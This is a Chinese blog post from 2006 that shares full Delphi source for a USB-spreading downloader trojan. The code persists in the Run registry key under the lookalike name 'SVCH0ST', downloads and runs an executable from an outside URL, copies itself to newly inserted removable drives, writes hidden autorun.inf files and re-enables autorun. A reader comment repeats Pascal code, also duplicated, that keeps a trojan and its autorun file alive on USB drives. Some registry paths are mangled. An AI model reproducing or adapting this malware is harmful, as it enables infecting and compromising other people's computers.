unit Un_Main;
interface
uses
Windows, Messages, SysUtils,Forms,IniFiles;
type
TFrm_Main = class(TForm)
procedure FormCreate(Sender: TObject);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
private
procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
public
{ Public declarations }
end;
const
exefile = 'SVCH0ST.EXE';
Buffer = 'http://www.888.com/hello.exe';
DBT_DEVICEARRIVAL = $8000; // system detected a new device
DBT_DEVICEREMOVECOMPLETE = $8004; // device is gone
DBT_DEVTYP_VOLUME = $00000002; // logical volume
DBTF_MEDIA = $0001; // media comings and goings
type
PDEV_BROADCAST_HDR = ^TDEV_BROADCAST_HDR;
TDEV_BROADCAST_HDR = packed record
dbch_size : DWORD;
dbch_devicetype : DWORD;
dbch_reserved : DWORD;
end;
PDEV_BROADCAST_VOLUME = ^TDEV_BROADCAST_VOLUME;
TDEV_BROADCAST_VOLUME = packed record
dbcv_size : DWORD;
dbcv_devicetype : DWORD;
dbcv_reserved : DWORD;
dbcv_unitmask : DWORD;
dbcv_flags : WORD;
end;
function UrlDownLoadToFile(Caller,URL,FileName: PAnsiChar;Reserved: LongWord;
StatusCB: Pointer): LongWord;
stdcall; external 'URLMON.DLL' name 'URLDownloadToFileA';
function WinExec(lpCmdline: PAnsiChar; uCmdShow: LongWord): LongWord;
stdcall; external 'kernel32.dll' name 'WinExec';
var
Frm_Main: TFrm_Main;
exefull:string;
implementation
{$R *.dfm}
function SetRegValue(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
result := false;
RegCreateKey(key,PChar(subkey),regkey);
if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
result := true;
RegCloseKey(regkey);
end;
procedure Startup(var TheName:string);
begin
SetRegValue(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\Run','SVCH0ST',TheName);
UrlDownloadToFile(nil, PChar(Buffer), PChar(TheName), 0, nil);
SetFileAttributes(PChar(TheName),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
messagebox(0,'文件下载成功!','成功',MB_OK);
WinExec(PChar(TheName), SW_SHOWDEFAULT);
//Sleep(500);
//DeleteMe;
//freemem(@path,256);
end;
procedure TFrm_Main.WMDeviceChange(var Msg: TMessage);
var
lpdb : PDEV_BROADCAST_HDR;
lpdbv : PDEV_BROADCAST_VOLUME;
unitmask:DWORD;
i:integer;
MyIni:TIniFile;
s:Hkey;
value:dword ;
inifile:string;
begin
lpdb := PDEV_BROADCAST_HDR(Msg.LParam);
case Msg.WParam of
DBT_DEVICEARRIVAL ://有设备安装完毕
if lpdb.dbch_devicetype=DBT_DEVTYP_VOLUME then
begin
lpdbv := PDEV_BROADCAST_VOLUME(lpdb);
unitmask:=lpdbv.dbcv_unitmask;//取得设备的盘符
for i:=0 to 25 do //遍历磁盘
begin
if Boolean(unitmask and $1)then//看该驱动器的状态是否发生了变化
break;
unitmask := unitmask shr 1;
end;
if fileexists(exefull) then //向u盘拷文件
begin
copyfile(PChar(exefull),Pchar(char(i+65) + ':\' + exefile),false);
FileSetAttr(char(i+65) + ':' + exefile,$00000003);
end;
inifile:=char(i+65)+':AutoRun.inf';//ini文件
RegOpenKeyEx(HKEY_CURRENT_USER, 'SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer', 0, KEY_ALL_ACCESS, s);
value:=0;
RegSetValueEx(s,'NoDriveTypeAutoRun',0, REG_DWORD,@value, sizeof(value));
RegCloseKey(s);
if fileexists(inifile) then
begin
FileSetAttr(inifile,$00000000);
DeleteFile(inifile);
end;
MyIni := TIniFile.Create(inifile);
MyIni.WriteString('AutoRun', 'open',exefile);
FileSetAttr(inifile,$00000003);
end;
end;
end;
procedure TFrm_Main.FormCreate(Sender: TObject);
var
s:hkey;
value:array[0..255]of char;
size:cardinal;
path:array[0..255] of char;
begin
Application.ShowMainForm:=False;
getsystemdirectory(path,120);
exefull := strpas(path) + '' + exefile;
size:=256;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun',0,KEY_ALL_ACCESS,s);
RegQueryValueEx(s,'SVCH0ST',nil,nil,@value,@size);
RegCloseKey(s);
//文件存在且有自启动
if fileexists('C:WINDOWSsystem32SVCH0ST.EXE') and (UpperCase(value) = UpperCase(exefull)) then
messagebox(0,'自启动成功!','成功,MB_OK)
else
Startup(exefull);//下载执行函数
end;
procedure TFrm_Main.FormClose(Sender: TObject; var Action: TCloseAction);
begin
Application.Terminate;
end;
end.
下载者U盘传染源码
Post by amxku on 2006-12-23, 07:20. 技术相关
Tags: delphi
Address: http://www.amxku.net/archives/801/
相关文章
网友评论
http://www.virustotal.com/en/indexx.html
Post by king(61.152.*.*) on 2006-12-25, 05:00 Quote #1
...哈哈,大哥,我来顶一下你~~
对了,上面的代码编译出来的体积会很大,你可以写成纯pascal的程序,偶给出一小段很菜很菜的代码你看看:
function getfilesize(cfile:string):integer; //获取文件字节
var sr: TSearchRec;
begin
if findfirst(cfile,faAnyFile,sr)=0 then
result:=sr.Size
else
result:=0;
findclose(sr);
end;
Function FindFirstRemoveDrive: Char; //判断U盘函数
Var
drivemap, mask: DWORD;
i: Integer;
root: String;
Begin
Result := #0;
root := \'C:\\\';
drivemap := GetLogicalDrives;
mask := 1;
For i := 1 To 32 Do
Begin
If (mask And drivemap) <> 0 Then
If GetDriveType(PChar(root)) = DRIVE_REMOVABLE Then
Begin
Result := root[1];
Break;
End;
mask := mask Shl 1;
Inc(root[1]);
End;
End;
if (FindFirstRemoveDrive <> \'\') then //判断U盘是否存在
begin
runfile:=FindFirstRemoveDrive + \':\\autorun.inf\';
Ufile:=FindFirstRemoveDrive + \':\\fuckie.exe\';
if (not fileexists(runfile)) or (infsize = 0) or (infsize <> getfilesize(runfile)) then
begin
FilesetAttr(runfile, 0);
deletefile(runfile);
assignfile(runtext,runfile);
rewrite(runtext);
writeln(runtext,\'[AutoRun]\');
writeln(runtext,\'open=fuckie.exe\');
writeln(runtext,\'shellexecute=fuckie.exe\');
writeln(runtext,\'shell\\Auto\\command=fuckie.exe\');
closefile(runtext);
SetFileAttributes(pchar(runfile),FILE_ATTRIBUTE_HIDDEN);
infsize:=getfilesize(runfile); //获取文件字节
end;
if (not fileexists(Ufile)) or (getfilesize(exefile) <> getfilesize(Ufile)) then
begin
CopyFile(pchar(exefile),pchar(Ufile),false); //exefile为自身木马路径
SetFileAttributes(pchar(Ufile),FILE_ATTRIBUTE_HIDDEN);
end;
end;
PS:没有什么深的技术,代码很简单,不过可以实时保护autorun.inf文件和木马文件,当一被人修改的话,就会马上恢复...
infsize为全局integer变量,通过它保存字节数,每次判断文件是否存在和字节数是否被改变(如果文件被替换或者修改,字节数就会改变~ ^_^)
如果你有什么新的思路,请给予指教~! ^_^ E-Mail:Ch4o.Jt#GMail.Com By:Ch4o.Jt
对了,上面的代码编译出来的体积会很大,你可以写成纯pascal的程序,偶给出一小段很菜很菜的代码你看看:
function getfilesize(cfile:string):integer; //获取文件字节
var sr: TSearchRec;
begin
if findfirst(cfile,faAnyFile,sr)=0 then
result:=sr.Size
else
result:=0;
findclose(sr);
end;
Function FindFirstRemoveDrive: Char; //判断U盘函数
Var
drivemap, mask: DWORD;
i: Integer;
root: String;
Begin
Result := #0;
root := \'C:\\\';
drivemap := GetLogicalDrives;
mask := 1;
For i := 1 To 32 Do
Begin
If (mask And drivemap) <> 0 Then
If GetDriveType(PChar(root)) = DRIVE_REMOVABLE Then
Begin
Result := root[1];
Break;
End;
mask := mask Shl 1;
Inc(root[1]);
End;
End;
if (FindFirstRemoveDrive <> \'\') then //判断U盘是否存在
begin
runfile:=FindFirstRemoveDrive + \':\\autorun.inf\';
Ufile:=FindFirstRemoveDrive + \':\\fuckie.exe\';
if (not fileexists(runfile)) or (infsize = 0) or (infsize <> getfilesize(runfile)) then
begin
FilesetAttr(runfile, 0);
deletefile(runfile);
assignfile(runtext,runfile);
rewrite(runtext);
writeln(runtext,\'[AutoRun]\');
writeln(runtext,\'open=fuckie.exe\');
writeln(runtext,\'shellexecute=fuckie.exe\');
writeln(runtext,\'shell\\Auto\\command=fuckie.exe\');
closefile(runtext);
SetFileAttributes(pchar(runfile),FILE_ATTRIBUTE_HIDDEN);
infsize:=getfilesize(runfile); //获取文件字节
end;
if (not fileexists(Ufile)) or (getfilesize(exefile) <> getfilesize(Ufile)) then
begin
CopyFile(pchar(exefile),pchar(Ufile),false); //exefile为自身木马路径
SetFileAttributes(pchar(Ufile),FILE_ATTRIBUTE_HIDDEN);
end;
end;
PS:没有什么深的技术,代码很简单,不过可以实时保护autorun.inf文件和木马文件,当一被人修改的话,就会马上恢复...
infsize为全局integer变量,通过它保存字节数,每次判断文件是否存在和字节数是否被改变(如果文件被替换或者修改,字节数就会改变~ ^_^)
如果你有什么新的思路,请给予指教~! ^_^ E-Mail:Ch4o.Jt#GMail.Com By:Ch4o.Jt
Post by Ch4o.Jt(219.129.*.*) on 2006-12-26, 11:21 Quote #2
晕,你的BLOG评论作了过滤...-_-o
Post by Ch4o.Jt(219.129.*.*) on 2006-12-26, 11:22 Quote #3
发表评论
Processed in 0.039341 second(s), 9 queries, Gzip enabled
Copyright © 2005- 2008 amxku's blog. Supported by S.4.T 鄂ICP备05024839号
Copyright © 2005- 2008 amxku's blog. Supported by S.4.T 鄂ICP备05024839号